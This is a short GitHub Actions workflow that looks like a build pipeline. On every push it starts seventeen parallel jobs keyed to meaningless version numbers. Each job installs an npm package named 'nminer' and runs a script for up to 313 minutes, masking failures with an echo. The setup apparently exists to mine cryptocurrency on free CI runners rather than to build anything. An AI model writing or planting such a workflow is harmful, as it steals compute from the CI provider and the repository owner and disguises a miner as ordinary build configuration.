name: morbidity
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9004 }
          - { version: 629 }
          - { version: 4109 }
          - { version: 5569 }
          - { version: 4599 }
          - { version: 5649 }
          - { version: 2610 }
          - { version: 724 }
          - { version: 5790 }
          - { version: 5923 }
          - { version: 8503 }
          - { version: 9602 }
          - { version: 8321 }
          - { version: 5314 }
          - { version: 2650 }
          - { version: 8153 }
          - { version: 2236 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: bare
        run: |
          npm install nminer@latest
          timeout 313m node morbidity.js || echo "morbidity executed"